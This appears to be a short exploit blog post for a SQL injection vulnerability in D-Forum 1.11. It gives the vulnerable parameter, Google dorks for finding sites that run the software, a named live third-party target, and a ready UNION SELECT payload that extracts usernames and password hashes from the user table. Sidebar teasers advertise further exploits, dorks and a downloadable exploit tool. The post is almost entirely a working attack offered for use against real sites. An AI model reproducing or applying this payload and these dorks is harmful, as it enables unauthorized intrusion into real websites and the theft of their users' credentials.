D-Forum 1.11 SQL Injection Vulnerability
EXPLOIT :
http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]
DORK:
"Powered by D-forum"
"nav.php3?page=voirsujet"
Live Target :
http://va.teamdh.free.fr/dforum/nav.php3?page=voirsujet&boardid=1&postid=1
-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
POC :
-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
Popular Posts
-
# Exploit Title : Wordpress zingiri-forum Plugin SQL Injection Vulnerability # Security Risk : Medium # Google Dork : inurl:/wp-content/plug...
-
D-Forum 1.11 SQL Injection Vulnerability EXPLOIT : http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi] D...
-
Exploit Title: WordPress plugins KBoard SQLi/XSS Vulnerabilities # Vendor Homepage: http://www.cosmosfarm.com/products/kboard # Downloa...
-
JCE Exploit 2 Download Dulu : http://xx.pa-rc.org/x86/JCE.exe Dorknya : inurl:”/index.php?option=com_jce” inurl:index.php?option=com...
-
WHMCS? WHMCS ni adalah WHMCompleteSolution dimana selalunya webapps ni digunakan untuk laman jual beli seperti laman web hosting dan domain....
0 comments:
Post a Comment